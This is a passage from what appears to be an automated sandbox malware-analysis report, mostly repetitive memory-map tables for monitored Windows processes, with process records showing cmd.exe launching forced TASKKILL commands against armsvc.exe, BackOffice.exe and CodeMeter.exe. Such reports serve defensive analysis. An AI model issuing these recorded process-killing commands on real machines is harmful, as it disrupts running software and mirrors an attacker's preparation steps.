| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a8a0000 | 0x6a98afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a990000 | 0x6a99efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a9a0000 | 0x6a9a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9b0000 | 0x6a9c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a9d0000 | 0x6aa04fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM armsvc.exe /IM armsvc.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x668 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
678
0x
6E4
0x
884
0x
888
0x
890
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x002e0000 | 0x0039ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000580000 | 0x00580000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00847fff | Pagefile Backed Memory | Readable |
|
|
|
|
| taskkill.exe | 0x008a0000 | 0x008b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x00a40fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x01e4ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001e50000 | 0x01e50000 | 0x01f4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002000000 | 0x02000000 | 0x0203ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002140000 | 0x02140000 | 0x0217ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02180000 | 0x0244efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002490000 | 0x02490000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a710000 | 0x6a7a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a8c0000 | 0x6a8d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a8f0000 | 0x6a918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a920000 | 0x6a97bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a980000 | 0x6a989fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a990000 | 0x6a9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a9d0000 | 0x6a9defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9e0000 | 0x6a9f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6aa00000 | 0x6aa0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM BackOffice.exe /IM BackOffice.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:21, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:14 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x838 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
834
0x
8A0
0x
89C
0x
898
0x
8C4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000f0000 | 0x000f3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001e0000 | 0x001e0000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000340000 | 0x00340000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x003c0000 | 0x0047ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000004a0000 | 0x004a0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004e0000 | 0x004e0000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000690000 | 0x00690000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x0070ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000710000 | 0x00710000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x00a70fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a80000 | 0x00a80000 | 0x00b7ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00bb0000 | 0x00bc5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000bd0000 | 0x00bd0000 | 0x01fcffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01fd0000 | 0x0229efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002370000 | 0x02370000 | 0x023affff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a730000 | 0x6a747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a750000 | 0x6a7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a8a0000 | 0x6a98afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a990000 | 0x6a99efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a9a0000 | 0x6a9a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9b0000 | 0x6a9c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a9d0000 | 0x6aa04fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM CodeMeter.exe /IM CodeMeter.exe |
